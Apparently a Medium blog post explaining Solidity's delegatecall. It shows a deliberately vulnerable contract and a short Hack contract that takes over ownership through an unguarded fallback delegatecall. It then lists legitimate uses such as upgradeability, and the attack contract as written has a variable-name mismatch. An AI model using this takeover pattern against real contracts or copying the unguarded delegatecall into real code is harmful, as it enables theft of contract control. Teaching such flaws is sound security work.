Open in app

Sign in

Write

Sign in

Delegate call: A double edge sword

Aniket Prajapati
2 min readJan 1, 2023

--

Delegate call is a valuable tool in the Ethereum ecosystem that allows contract developers to execute code from another contract as if it were part of the calling contract. This can be useful for various purposes, such as code reuse, upgradeability, and modularity.

Note that when using delegate call, the storage and balance of the calling contract are used rather than those of the contract being called. Any changes to storage or balance made by the delegate contract will affect the calling contract.

The objective is to change the owner for the Base contract.

contract Base {
  address public owner;
  Temp public temp;

  constructor(Temp _temp) public {
    owner = msg.sender;
    temp = Temp(_temp);
  }
  
  fallback() external payable {
    address(temp).delegatecall(msg.data);
  }
}

contract Temp {
  address public owner;
  
  function pwn() public {
    owner = msg.sender;
  }
}

In the above code, when we delegate call from Base to Temp, the code will be executed from the Temp contract, but variables, value, and eth will be used for the Base contract.

Note: Must remember things about delegate call: delegate call preserves context, and storage layout must be same for A and B.

contract Hack {
  address public Base;
  
  constructor(address _base) public {
    base = _base;
  }

  function hack() public {
    base.call(abi.encodeWithSignature("pwn()"));
  }
}

The goal is to call the pwn function from the Temp contract, which can only be called by calling fallback function from the Base contract.

Now, when we call the hack function, it will try to call the pwn() function inside the Base contract, which is not available; hence fallback function will be executed, which will delegate the call to the pwn() function for the Temp contract with the msg.data. The owner-state variable will then be updated for the Base contract and not for the Temp contract, as it is a delegate call.

Conclusion:

Delegate call can be a powerful tool for contract developers, but it is important to use them carefully and consider the potential consequences of executing external code.

One potential use case for delegate call is code reuse. Instead of duplicating code across multiple contracts, you can use delegate call to share code between contracts. This can help to reduce code duplication and improve maintainability.

Another use case is contract upgradeability. You can update a contract using delegate call without changing its address or breaking any existing references. This can make deploying updates and fixing bugs easier without disrupting your contract’s users.

Finally, delegate call can be used to improve the modularity of your contract architecture. By separating different functionality into separate contracts and using delegate call to invoke them, you can make your contracts more modular and easier to understand.

Delegate call is a useful feature in Solidity that can help you write more efficient and maintainable contract code.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Smart Contract Security
Solidity
Smart Contract Auditing

--

--

Aniket Prajapati
Aniket Prajapati

Written by Aniket Prajapati

15 Followers
31 Following

Afficianado - Blockchain - https://aniketpr01.github.io/

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams